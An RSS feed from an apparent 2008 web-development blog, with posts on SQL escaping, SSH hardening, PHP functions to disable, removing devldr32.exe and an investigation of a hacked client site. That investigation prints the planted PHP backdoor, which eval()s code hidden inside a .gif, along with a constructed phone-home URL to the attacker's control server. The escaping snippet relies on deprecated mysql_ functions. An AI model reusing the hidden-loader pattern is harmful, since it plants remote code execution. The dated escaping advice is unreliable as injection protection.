<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Leading Edge Scripts &#187; Computer Security</title>
	<atom:link href="http://leadingedgescripts.co.uk/category/computer-security/feed/" rel="self" type="application/rss+xml" />
	<link>http://leadingedgescripts.co.uk</link>
	<description></description>
	<lastBuildDate>Fri, 16 Oct 2009 09:14:32 +0000</lastBuildDate>
	
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Preventing SQL Injection</title>
		<link>http://leadingedgescripts.co.uk/web-development/preventing-sql-injection/</link>
		<comments>http://leadingedgescripts.co.uk/web-development/preventing-sql-injection/#comments</comments>
		<pubDate>Fri, 21 Nov 2008 16:43:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Databases]]></category>
		<category><![CDATA[Web Development]]></category>
		<category><![CDATA[clean up input data]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.leadingedgescripts.co.uk/?p=222</guid>
		<description><![CDATA[For anyone who needs it, here is a script I wrote to prevent SQL injection. It uses references to the original global arrays to clean them up.

/**
 * added the following code to enable readiness for magic_quotes() being removed
 * in PHP6
 *
 * added by C. Cook 15/8/2008
 */
//Turn off magic quotes the manual way, this also [...]]]></description>
			<content:encoded><![CDATA[<p>For anyone who needs it, here is a script I wrote to prevent SQL injection. It uses references to the original global arrays to clean them up.</p>
<pre>/**
 * added the following code to enable readiness for magic_quotes() being removed
 * in PHP6
 *
 * added by C. Cook 15/8/2008
 */
//Turn off magic quotes the manual way, this also cleans up all our nasty data
//(mysql_real_escape_string() needs an open MySQL connection, so run this after connecting)
$in = array(&amp;$_GET, &amp;$_POST, &amp;$_COOKIE);

while (list($k, $v) = each($in)) {

    foreach ($v as $key =&gt; $val) {

        if (!is_array($val)) {
            //now we re-escape our input data
            $in[$k][$key] = mysql_real_escape_string(stripslashes($val));
            //$in[$k][$key] = stripslashes($val);
            continue;
        }
        //nested array: queue a reference to it so the while loop cleans it too
        $in[] =&amp; $in[$k][$key];
    }
}
unset($in);</pre>
]]></content:encoded>
			<wfw:commentRss>http://leadingedgescripts.co.uk/web-development/preventing-sql-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Simple Tip To Reduce Brute Force Hacks Via SSH</title>
		<link>http://leadingedgescripts.co.uk/computer-security/simple-tip-to-reduce-brute-force-hacks-via-ssh/</link>
		<comments>http://leadingedgescripts.co.uk/computer-security/simple-tip-to-reduce-brute-force-hacks-via-ssh/#comments</comments>
		<pubDate>Mon, 17 Nov 2008 22:03:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[brute force]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://www.leadingedgescripts.co.uk/?p=224</guid>
		<description><![CDATA[This is very simple, but I&#8217;ve seen a massive reduction in brute force attempts simply by changing the default port for SSH connections.
It&#8217;s pretty simple to change the default port:
Just edit the SSH configuration file, normally this will be found in /etc/ssh or /usr/local/etc/ssh.
To change it over, edit the line that reads &#8220;Port 22&#8221; or [...]]]></description>
			<content:encoded><![CDATA[<p>This is very simple, but I&#8217;ve seen a massive reduction in brute force attempts simply by changing the default port for SSH connections.</p>
<p>It&#8217;s pretty simple to change the default port:</p>
<p>Just edit the SSH configuration file, normally this will be found in /etc/ssh or /usr/local/etc/ssh.</p>
<p>To change it over, edit the line that reads &#8220;Port 22&#8221; or &#8220;#Port 22&#8221; to a different port number and then restart SSH.</p>
]]></content:encoded>
			<wfw:commentRss>http://leadingedgescripts.co.uk/computer-security/simple-tip-to-reduce-brute-force-hacks-via-ssh/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>On The Hunt For a Hacker &#8211; Part One</title>
		<link>http://leadingedgescripts.co.uk/computer-security/on-the-hunt-for-a-hacker-part-one/</link>
		<comments>http://leadingedgescripts.co.uk/computer-security/on-the-hunt-for-a-hacker-part-one/#comments</comments>
		<pubDate>Sat, 15 Nov 2008 15:18:31 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[hacking attempt]]></category>

		<guid isPermaLink="false">http://www.leadingedgescripts.co.uk/?p=214</guid>
		<description><![CDATA[One of my clients has recently been hacked, and not knowing who else to turn to asked me to look into the hack, try and sort out the mess and fix the broken websites.
So before I start this post I think I should make it clear that I am supporting my client&#8217;s legacy code, which [...]]]></description>
			<content:encoded><![CDATA[<p>One of my clients has recently been hacked, and not knowing who else to turn to asked me to look into the hack, try and sort out the mess and fix the broken websites.</p>
<p>So before I start this post I think I should make it clear that I am supporting my client&#8217;s legacy code, which was developed by another developer at least 3-4 years ago. My client is aware of the issues with the code and is actively seeking to patch it up.</p>
<p>So anyway, yesterday I got an email from my client at around 3pm showing some rather nasty Google search results with some of his domains listed in them. Naturally I clicked on the links to see what would happen, and sure enough, after being sent to my client&#8217;s website, I was sent on to some kind of affiliate web page full of pop-ups trying to tell me my machine had a virus and that I should buy the anti-virus software they were selling &#8211; I&#8217;m sure you&#8217;ve all seen the kind of website I&#8217;m talking about.</p>
<p>So obviously this is a bit of an emergency, so I stopped what I was doing and started to investigate. I&#8217;m still not certain how the attack is being implemented since we&#8217;ve not yet managed to discover how the hacker is getting access to the server, hence this being probably the first post in a series, but I&#8217;ll tell you what I know.</p>
<p>About a month ago, my client phoned me up saying he had accidentally clicked on a virus in his email, and it had caused major problems on his PC. He told me he was running anti-virus software and cleaning up his machines. Knowing that my client doesn&#8217;t have the greatest computer skills I thought &#8220;uh oh&#8221; this could be bad.</p>
<p>Shortly after this, maybe a week later, my client phones up because one of his clients&#8217; ecommerce websites (he runs a small web development firm) was redirecting visitors to a web page selling anti-virus software! (sound familiar?). So I took a look around the code and discovered that one of the product names in the database had been changed to include some JavaScript which redirected you immediately to this AV affiliate website.</p>
<p>My first thought was oh no, this means the website has been SQL injected, so I looked through the logs and sure enough there were some requests coming from a bot that was trying to SQL inject. Obviously I patched up the SQL injection vulnerability and thought nothing else of the issue.</p>
<p>Then, about 2 weeks later, I get another phone call; the website&#8217;s doing the same thing. So now I know it can&#8217;t be SQL injection, which means the hacker either has root access to the server the website(s) are on (more than one has been affected to date), or that the hacker has FTP access, so I instruct my client to change all his FTP usernames and passwords, which he promptly does, and I fix the issues with the code.</p>
<p>Then about 2 weeks more pass by and I get an email entitled &#8220;Nightmare!!&#8221;, which is kind of where this story begins&#8230;</p>
<p>So, as I mentioned above, I visited the website in my browser &#8211; looks fine, I am able to browse the shop, I&#8217;m not redirected anywhere, but the email from my client has links to this website that definitely redirect to the affiliate website in question. So I type the address into my browser including the full URL from my client&#8217;s email, and sure enough I am redirected to this affiliate website.</p>
<p>The url looked like this:</p>
<blockquote><p>http://www.clientsdomain.com/index.php?id=50000</p></blockquote>
<p>So naturally I checked out index.php, and saw the following code:</p>
<blockquote><p>&lt;?<br />
$browser = CheckBrowser();<br />
$link = $browser ? 'index.php?id=50000' : 'about-us.php';<br />
$title = $browser ? 'Blog &lt;font color=#FF0000&gt;(NEW)&lt;/font&gt;' : 'About us';<br />
?&gt;<br />
&lt;td height=&quot;26&quot; align=&quot;center&quot; class=&quot;style51&quot;&gt;&lt;a href=&quot;&lt;? echo $link; ?&gt;&quot;&gt;&lt;? echo $title; ?&gt;&lt;/a&gt;&lt;/td&gt;</p></blockquote>
<p>Roughly speaking, this code checks the browser, and either displays a link to about-us.php or links off to the URL above (index.php?id=50000).</p>
<p>Now, that&#8217;s interesting, so I needed to know what the php function CheckBrowser() was doing&#8230; so I had to hunt around the code (all Object Orientated Code without documentation) and I found the CheckBrowser() function &#8211; it was basically testing to see if the request was being made by GoogleBot, or Yahoo. So to test my theory I used the following great little tool ( <a href="http://www.web-tool.org/cloak-check/cloak-check.asp">http://www.web-tool.org/cloak-check/cloak-check.asp</a> ) in conjunction with <a href="http://bethebot.com">http://bethebot.com</a> and yep, this website was definitely cloaking.</p>
<p>So then I had to figure out how it was redirecting, index.php didn&#8217;t have any code to check for $_GET variables, nor did it include any code to redirect people; strange&#8230;</p>
<p>So I took another good look around the code and found the following bit of PHP:</p>
<pre>        if(isset($_REQUEST['id']))
        if(($_REQUEST['id']&gt;=50000)&amp;&amp;($_REQUEST['id']&lt;60000))
        {
            $fls = array(array('images/product-display-box_19.gif',3696,21894));
            foreach($fls as $v)
            if(file_exists($v[0]))
            {
                $f=fopen($v[0],'rb');fseek($f,$v[1],SEEK_SET);$d=fread($f,$v[2]);fclose($f);eval($d);megadupa($v[0]);
                break;
            }
            die();
        }</pre>
<p>Amusingly, placed immediately preceding my code designed to prevent SQL injection.</p>
<p>Now look at this code: when there is a $_GET variable called id with a value between 50000 and 60000, it opens a file on the server, product-display-box_19.gif, reads a specific part of that file and then eval()s whatever it finds (which means it &#8220;runs the code&#8221;). Now a .gif image shouldn&#8217;t be able to be executed, so how does this work? And what the hell is the megadupa() function? That&#8217;s not part of the PHP language, so why isn&#8217;t this falling over saying that that is bad PHP?</p>
<p>So the next port of call was to look at product-display-box_19.gif. I checked out the images/ folder on the server and guess what, there is a 19MB file with that very name. Now 19MB is HUGE for an image file, so I thought I need to see this.</p>
<p>I downloaded it from the server, and double clicked on it &#8211; I&#8217;m pretty good with PCs, so although I knew I might suffer a buffer overflow attack or a trojan, I&#8217;m confident I can handle these things :-)</p>
<p>Well, I loaded up the image and it was a tiny little .gif, it looked like the bottom of a button and would normally be 19 KB in size not 19 MB! Obviously there is something fishy going on here. So I opened the .gif file using Notepad++, took ages of course, but once it had loaded, I scanned through the code and sure enough this .gif file has been specially crafted and contains loads of PHP, XHTML / CSS the lot, in fact it&#8217;s a pretty amazing file.</p>
<p>So I renamed the file to .php and, noticing that there were some comments in the embedded PHP instructing me how to run the code without the eval() function, stuck it on my local server and voila, it loaded! And it didn&#8217;t just load anything, it loaded what looked like clones of WordPress &#8211; two of them, loads of sex related keywords, basically this thing looked like it had been used repeatedly to hack servers. What a find.</p>
<p>So being curious I started to trawl through the code, and guess what, this script &#8220;phones home&#8221;, revealing IP addresses. So I followed them, and ended up on a webserver in the USA, with a message saying that &#8220;the service was unavailable&#8221;, so I referred back to the code, and noticed that when it &#8220;phones home&#8221; it also sends back information about the referrer, domain, IP address etc etc so I constructed a fake URL as follows:</p>
<blockquote><p>http://123.123.123.123/gate/gate.php?t=av&amp;s=2&amp;pid=665&amp;uri=www.example.com%2Findex.php&amp;ip=64.22.112.234&amp;ref=&amp;ua=Mozilla%2F5.0+%28compatible%3B+Googlebot%2F2.1%3B+%2Bhttp%3A%2F%2Fwww.google.com%2Fbot.html%29</p></blockquote>
<p>And, I was in!</p>
<p>Suddenly this server in America sends me back a web address, you guessed it, for the affiliate website.</p>
<p>So now I&#8217;m looking at a server which instructs these scripts to point other people&#8217;s websites to a URL of the hacker&#8217;s choice! Of course at this stage I whois&#8217;ed the IP address and yes I know who is hosting the IP.</p>
<p>So next up, I do a reverse DNS lookup using <a href="http://www.myipneighbors.com/">http://www.myipneighbors.com/</a> and I find some of the other websites on the server in America. So I visited them, they pretty much all seemed to be spammy fake &#8220;search engines&#8221; but interestingly they linked back to another IP address &#8211; also in America, but on a different host server. So I loaded up the new IP address and was immediately redirected to a domain. I&#8217;m not going to reveal the domain, but this gave me something else to run a whois check on.</p>
<p>So I did, and the domain resolved to someone in Texas, but even more interestingly, it included an email address for the registrant: @mail.ru</p>
<p>So now I&#8217;m looking at a Russian hacker, using a server in America to control what seems to be a number of compromised servers to redirect websites and manipulate search engine results to point to an affiliate website selling anti-virus software.</p>
<p>So, since I still don&#8217;t know how this person got into my client&#8217;s website in the first place, I have instructed him to change his FTP passwords and not to log in again for the time being. I will be contacting the web hosting company and I&#8217;m waiting to see if the hacker gets back in again, if they do I can only presume the web host has been compromised.</p>
<p>Look out for part two&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://leadingedgescripts.co.uk/computer-security/on-the-hunt-for-a-hacker-part-one/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Scary PHP Functions You Should Disable</title>
		<link>http://leadingedgescripts.co.uk/server-administration/scary-php-functions-you-should-disable/</link>
		<comments>http://leadingedgescripts.co.uk/server-administration/scary-php-functions-you-should-disable/#comments</comments>
		<pubDate>Mon, 03 Nov 2008 18:49:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Server Administration]]></category>
		<category><![CDATA[Web Development]]></category>
		<category><![CDATA[disable functions]]></category>
		<category><![CDATA[php functions]]></category>
		<category><![CDATA[php security]]></category>

		<guid isPermaLink="false">http://www.leadingedgescripts.co.uk/?p=143</guid>
		<description><![CDATA[A few months back we completed a security update on one of our main servers and whilst we were performing the update we realised that there is a distinct lack of information out there concerning the security of PHP functions, and no good lists of functions that should be banned or switched off.
When you install PHP, it [...]]]></description>
			<content:encoded><![CDATA[<p>A few months back we completed a security update on one of our main servers and whilst we were performing the update we realised that there is a distinct lack of information out there concerning the security of PHP functions, and no good lists of functions that should be banned or switched off.</p>
<p>When you install PHP, it doesn&#8217;t make a huge amount of recommendations about which functions you should ban on your servers. Although it basically does come out of the box in safe mode, which is great, as a web host trying to offer the best service possible, we like to offer our customers the choice of using PHP&#8217;s safe mode or not. I know that as a developer it&#8217;s a real pain to be forced to deal with things like magic quotes when you already have tight methods of blocking SQL injection, XSS attacks etc.</p>
<p>So, as a hosting company, we want to leave things as flexible as possible for developers, but it&#8217;s critical for us to know that our customers can&#8217;t write PHP code that could lead to our server being left wide open to attack.</p>
<p>So, being diligent web hosts we searched high and low for a decent list of PHP functions that we ought to ban, and surprisingly couldn&#8217;t really find any decent lists.</p>
<p>So, for anyone wondering what functions to ban, here is our list of PHP functions you should definitely not allow your customers to use!</p>
<p>exec, system, passthru, readfile, shell_exec, escapeshellarg, proc_close, proc_open, ini_alter, dl, parse_ini_file, show_source, popen, pclose, pcntl_exec, proc_get_status, proc_nice, proc_terminate, pfsockopen, posix_kill, posix_mkfifo, openlog, syslog, escapeshellcmd, apache_child_terminate, apache_get_env, apache_set_env, apache_note, virtual, error_log, openlog, syslog, readlink, symlink, link, highlight_file, closelog, ftp_exec, posix_setpgid, posix_setuid, posix_setsid, posix_setegid, posix_seteuid, posix_getpwnam, posix_ctermid, posix_uname, posix_getegid, posix_geteuid, posix_getpid, posix_getppid, posix_getpwuid</p>
<p>I&#8217;m not going to go into details here, but if you&#8217;re in for a fright, look these functions up (especially the posix ones) on the www.php.net website, you&#8217;ll be very scared!</p>
<p>This list may be overkill, but keep in mind, we&#8217;re aiming this at the shared server market. If anyone has any other functions they think should be banned, please let me know.</p>
]]></content:encoded>
			<wfw:commentRss>http://leadingedgescripts.co.uk/server-administration/scary-php-functions-you-should-disable/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How To Remove devldr32.exe from Windows XP &#8211; How I did it!</title>
		<link>http://leadingedgescripts.co.uk/viruses/how-to-remove-devldr32exe-from-windows-xp-how-i-did-it/</link>
		<comments>http://leadingedgescripts.co.uk/viruses/how-to-remove-devldr32exe-from-windows-xp-how-i-did-it/#comments</comments>
		<pubDate>Sat, 01 Nov 2008 18:00:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[devldr32.exe]]></category>

		<guid isPermaLink="false">http://www.leadingedgescripts.co.uk/wp/?p=27</guid>
		<description><![CDATA[If you don&#8217;t want to read about it, click here to see the solution
Once again, I seem to have found a poorly documented PC problem, funny how I always seem to be getting these&#8230;
Anyway, this page is all about how I managed to remove the unbelievably annoying file devldr32.exe from my Windows XP box. I recently [...]]]></description>
			<content:encoded><![CDATA[<p>If you don&#8217;t want to read about it, <a href="http://www.leadingedgescripts.co.uk/remove-devldr32.php#solution">click here to see the solution</a></p>
<p>Once again, I seem to have found a poorly documented PC problem, funny how I always seem to be getting these&#8230;</p>
<p>Anyway, this page is all about how I managed to remove the unbelievably annoying file devldr32.exe from my Windows XP box. I recently needed to move PCs as my old computer was starting to play up, doing things like not shutting down or starting up properly; you know the kinds of things that happen to Windows PCs after a while.</p>
<p>Since I had a spare PC knocking around, and it had a higher spec than the one I was using I decided to move onto the spare machine and turn my old PC into a proper server for my web development. This basically meant starting from scratch on the spare machine which I promptly did. To cut a long story short, I got it all up and running, got all the device drivers installed and was good to go!</p>
<p>Until I noticed a process running which I didn&#8217;t install, and which, quite frankly, I didn&#8217;t want running &#8211; guess which file! You got it devldr32.exe</p>
<p>So, like I normally do, I killed the processes, checked all the usual places that can cause files to auto start (startup folder, registry, services) and found nothing (or if I did find anything I deleted it, to be honest I can&#8217;t remember now).</p>
<p>Then obviously I restarted and, lo-and-behold, there&#8217;s that file running again, pretty much laughing at me. So I killed it again and carried on. Then I noticed it running again! How did that happen? I didn&#8217;t even restart my machine. So I killed it again and opened my ftp program (for no particular reason) and as I&#8217;m watching my process list, it fires itself up again.</p>
<p>So by now I&#8217;m starting to think this file must be a virus, so I did my usual Googling and found this: <a href="http://www.neuber.com/taskmanager/process/devldr32.exe.html">http://www.neuber.com/taskmanager/process/devldr32.exe.html</a>. Cool, useful and everything but no solution, and no clear answer on whether this is a virus or not. But at least it mentioned Creative SoundBlaster drivers, which I thought I had.</p>
<p>Anyway, cutting another longish story short, I searched and searched for ways to remove the stupid thing, including searching the Creative Labs website and everything.</p>
<p>Ultimately though, no matter what I did, I could neither remove the file nor find any information about how to remove the file. Now I&#8217;m not one to let these things get away, so I figured I&#8217;d have to solve the problem myself. And, thankfully I managed to, here&#8217;s how:</p>
<p>Actually the trick is rather simple, if you&#8217;re reading this you&#8217;ve probably already read about deleting devldr32.exe from c:\windows\system32\ and if you&#8217;ve really been paying attention, to also remove it from c:\windows\system32\dllcache\</p>
<p>That is basically the technique, but since the file seems to be able to load itself from whatever driver you&#8217;ve got loaded, simply killing the process and deleting those files doesn&#8217;t get rid of the little bugger!</p>
<p>Instead you need to reboot Windows XP into Safe mode, then delete the files. Complete explanation follows:</p>
<h4>Solution</h4>
<p><a name="solution"></a></p>
<ol>
<li>Restart your PC, as soon as it starts to come back online, start tapping the F8 key furiously, if you get it right, you&#8217;ll be presented with the option to load Windows XP in safe mode, choose it using the arrow keys and hit enter.</li>
<li>Windows XP will load and look rubbish, log in if you have to and open Windows explorer.</li>
<li>Go to C:\windows\system32\ and delete devldr32.exe</li>
<li>Now as a precaution, let&#8217;s remove it from the dll cache.</li>
<li>Still in Windows Explorer, click on the &#8216;Tools&#8217; menu at the top of the window, and select &#8216;Folder Options&#8217;</li>
<li>In the window that appears, click the &#8216;view&#8217; tab.</li>
<li>In the advanced settings section, check &#8216;Show hidden files and folders&#8217; and also <strong>uncheck</strong> &#8216;Hide protected operating system files (Recommended)&#8217;. (Click OK on the warning if you get one.)</li>
<li>Click OK to get out of the window you were in.</li>
<li>You should now be looking at a much longer list in the c:\windows\system32\ folder, if you look closely you should be able to see the \dllcache\ folder.</li>
<li>Click on it</li>
<li>Find devldr32.exe and delete it.</li>
<li>Now restart your machine (in normal mode by not pressing F8 repeatedly)</li>
<li>With luck devldr32.exe is gone for good and your soundcard still works nicely (albeit only on 2 speakers).</li>
</ol>
<p>I don&#8217;t know if there really is a virus out there calling itself devldr32.exe, I presume there is, fortunately I didn&#8217;t have the virus, I had the genuine file, as you can see even the genuine file was a pain to remove, but I imagine the virus is even harder to get rid of.</p>
<p>I have no idea how to remove the virus as I&#8217;ve never had it, but I can point you towards a great free virus scanner: <a href="http://www.clamwin.com/">http://www.clamwin.com/</a> and also a great free Rootkit remover: <a href="http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html">http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html</a> both come highly recommended by me. But, as always, I&#8217;m not responsible if you mess your PC up.</p>
]]></content:encoded>
			<wfw:commentRss>http://leadingedgescripts.co.uk/viruses/how-to-remove-devldr32exe-from-windows-xp-how-i-did-it/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>How to backup and email a dump of your Mysql database on Linux</title>
		<link>http://leadingedgescripts.co.uk/web-development/how-to-backup-and-email-a-dump-of-your-mysql-database-on-linux/</link>
		<comments>http://leadingedgescripts.co.uk/web-development/how-to-backup-and-email-a-dump-of-your-mysql-database-on-linux/#comments</comments>
		<pubDate>Sat, 01 Nov 2008 17:55:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Databases]]></category>
		<category><![CDATA[Web Development]]></category>

		<guid isPermaLink="false">http://www.leadingedgescripts.co.uk/wp/?p=24</guid>
		<description><![CDATA[A few weeks back, after working on an old, slow &#38; clunking server that I use to run a billing system, I thought to myself ‘hey you know what, it would be great to be able to email myself backups of my MySQL database. That will stop me worrying about losing all this data if [...]]]></description>
			<content:encoded><![CDATA[<p>A few weeks back, after working on an old, slow &amp; clunking server that I use to run a billing system, I thought to myself ‘hey you know what, it would be great to be able to email myself backups of my MySQL database. That will stop me worrying about losing all this data if this server ever dies on me.’</p>
<p>So, as you’ve probably guessed, I figured out how to do it. The answer’s actually very simple, and can easily be run as a cron job to automate the process on a daily basis.</p>
<p>First you need to make your MySQL dump file. (I prefer .sql files as I think it makes things way more transferable)</p>
<p>The command to dump all your data from MySQL is this:</p>
<p>          mysqldump -u username -p databasename &gt; mysqldumpfilename.sql</p>
<p>This will output a copy of your entire database to the file called mysqldumpfilename.sql (of course you can call yours whatever you want)</p>
<p>The next step is to get this file emailed to you. Somewhere (I don’t remember where) I found out that you should encode your mail attachments using the uuencode function in Linux.</p>
<p>So to email yourself a copy of your database backup, the command is as follows:</p>
<p>          uuencode mysqldumpfilename.sql mysqldumpfilename.sql | mail sylvia@home.com</p>
<p>Now just put the two together and you can email yourself a backup of your mysql database.</p>
]]></content:encoded>
			<wfw:commentRss>http://leadingedgescripts.co.uk/web-development/how-to-backup-and-email-a-dump-of-your-mysql-database-on-linux/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
